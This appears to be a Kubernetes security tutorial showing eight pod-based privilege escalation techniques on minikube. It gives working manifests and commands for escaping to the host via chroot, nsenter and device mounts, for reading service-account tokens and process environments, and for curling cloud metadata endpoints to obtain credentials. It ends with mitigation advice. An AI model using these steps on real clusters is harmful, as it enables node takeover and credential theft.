K8s: Vulnerability Voyage

Let's look at some common and simple ways for privilege escalation using K8s pods. Almost all of these vulnerabilities can be patched using pod security policies.

Prerequisites

Access to a K8s cluster
Permissions to create a pod and exec into it
No Pod Security Policies enforcement, either by K8s' native PodSecurityPolicy or by a third-party tool like gatekeeper

Back to Basics

As you might know, pods are nothing but a group of linux processes that are executed using two features of the Linux kernel called: namespaces and cgroups. While namespaces(HostName, PID, File System, Network, IPC) allow us to provide a "view" to the process that hides everything outside of those namespaces, the cgroup limits the resources(cpu, ram, block and network I/O) that the process can use.

Let's get started

K8s generally uses RBAC for authorization. Even in the cases where a user is not allowed to create a pod, there are at least seven other ways for them to create a pod, using the built-in controllers like: Job, CronJob, ReplicationController (it's not very common now-a-days), ReplicaSet, Deployment, DaemonSet and StatefulSet along with countless number of custom-controllers. So, if you are looking for ways to prevent your users from creating pods - look out for all of these different ways your cluster provides for creating them.

For our case, let's assume we have rights to create pod resources and to exec them.

Modes

privileged - A privileged container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use linux capabilities like manipulating the network stack and accessing devices.
hostPID
hostNetwork
hostIPC
hostPath

Attack 1 (Everything Allowed)

You can exec into the pod and mount the host's root filesystem and chroot to it, effectively becoming root on the host running your pod. If it's a control-plane node, you can access secrets directly from the etcd or use credentials of other privileged control plane components.

How

cat <<EOF  | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF


kubectl exec -it everything-allowed -- bash
root@minikube:/ docker ps
bash: docker: command not found
root@minikube:/ chroot host
sh-5.0# docker ps | head -n2
CONTAINER ID   IMAGE                  COMMAND                  CREATED         STATUS         PORTS     NAMES
f3d3252343be   ubuntu                 "/bin/sh -c -- 'whil…"   2 minutes ago   Up 2 minutes             k8s_everything-allowed_everything-allowed_default_89e48ca1-97e6-49a5-a51c-325c95a916eb_0

Attack 2 (Privileged and HostPID)

privileged breaks down most of the walls that container security provides and with hostPID they can see and enter the namespace of any process running on the host.

How

Let's nsenter to init process's namespace (from there onwards we'll have same access as with Attack 1 (Everything Allowed))

cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
EOF

kubectl exec -it priv-and-hostpid -- bash
bash-5.0 docker ps | head -n2
CONTAINER ID   IMAGE                  COMMAND                  CREATED          STATUS          PORTS     NAMES
c050527a7218   ubuntu                 "nsenter --target 1 …"   3 minutes ago    Up 3 minutes              k8s_priv-and-hostpid_priv-and-hostpid_default_267457b6-97c4-4d5f-bcec-d165a425f2fe_0
bash-5.0 cat /var/lib/kubelet/config.yaml
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: false
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /var/lib/minikube/certs/ca.crt
. . . . . .

Attack 3 (Privilege Only)

Like the first attack, in privileged mode access to node's devices is granted which includes the /dev filesystem. This filesystem can be mounted on the pod (this won't give a full view of filesystem as in Attack 1 though)

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-pod
spec:
  containers:
  - name: priv-pod
    image: ubuntu
    securityContext:
      privileged: true
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF


minikube ssh
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)

$ df
Filesystem     1K-blocks     Used Available Use% Mounted on
tmpfs            7345880   638328   6707552   9% /
. . . . . . . . .
tmpfs            4081044        8   4081036   1% /tmp
/dev/vda1      136554284 37411016  91262620  30% /mnt/vda1
. . . . . . . .


kubectl exec -it priv-pod -- bash
root@priv-pod:/ mkdir /tmp/host-fs
root@priv-pod:/ mount /dev/vda1 /tmp/host-fs/
root@priv-pod:/ cd /tmp/host-fs/
root@priv-pod:/tmp/host-fs ls
data  hostpath-provisioner  hostpath_pv  lost+found  var
root@priv-pod:/tmp/host-fs ls var/lib/docker/   # also var/lib/kubelet 
buildkit  containerd  containers  image  network  overlay2  plugins  runtimes  swarm  tmp  trust  volumes

Attack 4 (HostPath Only)

If the administrators have not limited what you can mount, you can mount / on the host into your pod, giving you read/write access on the host’s filesystem.

You can search for kubeconfig file and might get cluster-admin config file
Can search for tokens in /var/lib/kubelet/pods/ - look for tokens that might give access to secrets in kube-system or maybe have cluster-admin role
Can add your SSH key to the host

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-pod
spec:
  containers:
  - name: hostpath
    image: ubuntu
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF


kubectl exec -it hostpath-exec-pod -- bash
root@hostpath-exec-pod:/ cd /host/var/lib/kubelet/pods/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods# cd <pod-id>/volumes/kubernetes.io~secret/default-token-w8dkr/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods/. . .# ls -al
total 4
drwxrwxrwt 3 root root  140 Mar 22 04:31 .
drwxr-xr-x 3 root root 4096 Mar 22 04:31 ..
drwxr-xr-x 2 root root  100 Mar 22 04:31 ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root   31 Mar 22 04:31 ..data -> ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root   13 Mar 22 04:31 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root   16 Mar 22 04:31 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Mar 22 04:31 token -> ..data/token

Attack 5 (HostPID only)

With only hostPID, you can

View processes on the host – running ps within the pod would list all the processes running on the host (including processes on other pods)
View the environment variables for each pod on the host(process UIDs should match) - can read the /proc/[PID]/environ file for each process running on the host.
View the file descriptors for each pod on the host - can read the /proc/[PID]/fd[X] for each process running on the host.
Kill processes – can also kill any process on the node (presenting a denial-of-service risk)

You might get lucky and find secrets, token etc in output of ps or in env vars.

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpid-pod
spec:
  hostPID: true
  containers:
  - name: hostpid-pod
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF


kubectl exec -it hostpid-pod -- bash
root@hostpid-pod:/ ps aux
. . . <removed for brevity> . . .
root        5828  0.0  0.1 710940  8512 ?        Sl   03:34   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 25374a04ffcc777d5b0601a3af
root        5849  0.3  0.4 747660 38376 ?        Ssl  03:34   0:31 /coredns -conf /etc/coredns/Corefile
root        3348  1.5  0.9 10612728 74544 ?      Ssl  03:33   2:17 etcd --advertise-client-urls=https://192.168.64.3:2379 --cert-file=/var/lib/minikube/certs/etcd/server.crt --client-cert-auth=true --data-dir=/var/lib/minikube/etcd --initial-advertise-peer-urls=https://192.168.64.3:2380 --initial-cluster=minikube=https://192.168.64.3:2380 --key-file=/var/lib/minikube/certs/etcd/server.key
. . . . <removed for brevity> . . .

root@hostpid-pod:/ cat /proc/3348/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=minikubeSSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crtHOME=/root

You can only get environ for processes which share the same UID as our pod. To read env file of a process with different UID(987 let' say), run the pod with runAsUser specified to be that UID.

Attack 6 (HostNetwork only)

With only HostNetwork set to true, you can't get privileged code execution on the host directly. But, there are still some things you can look for

Traffic sniffing - You can sniff traffic using tools like tcpdump and might some secrets/tokens being sent over unencrypted.
Access services bound to localhost - You can access services listening only on loopback address.
Bypass network policy - If you set hostnetwork=true, your pod won't be restricted by a network policy applied to a namespace or pod (because your pod isn't bound to pod networking).

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostnetwork-pod
spec:
  hostNetwork: true
  containers:
  - name: hostnetwork
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF

Attack 7 (HostIPC only)

Nothing much that can be done here. You'll be able to read/write to same files/mechanisms that other processes use for IPC (ex: /dev/shm). You should check out the other IPC mechanisms with ipcs and see if anything is written there.

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostipc-pod
spec:
  hostIPC: true
  containers:
  - name: hostipc
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF


minikube ssh
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)

$ echo "secretpassword=usethissecret" > /dev/shm/secretpassword.txt

kubectl exec -it hostipc-pod -- bash
root@hostipc-pod:/ cat /dev/shm/secretpassword.txt
secretpassword=usethissecret

root@hostipc-pod:/ ipcs -a

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status

------ Semaphore Arrays --------
key        semid      owner      perms      nsems

Attack 8 (Nothing Allowed)

If nodes are part of cloud env, you can check for metadata service (you might find creds for cloud provider)

# AWS
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/

# Azure
curl -H Metadata:true "http://169.254.169.254/metadata/instance
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token

Overly permissive service account: By default the default SA of a namespace is mounted to a pod. If that SA is overly permissive, you can use that to further escalate your permissions in the cluster.

Conclusion

I just wanted to show how easy it is to gain unauthorized access to the underlying nodes or the cluster-itself in the absence of proper security checks.

All of the above attacks (except in Attack 8) can be mitigated by using PodSecurityPolicies. As of K8s 1.21, PodSecurityPolicy is deprecated and instead PodSecurityAdmisson (as of K8s 1.23 they are in beta state) controllers should be used.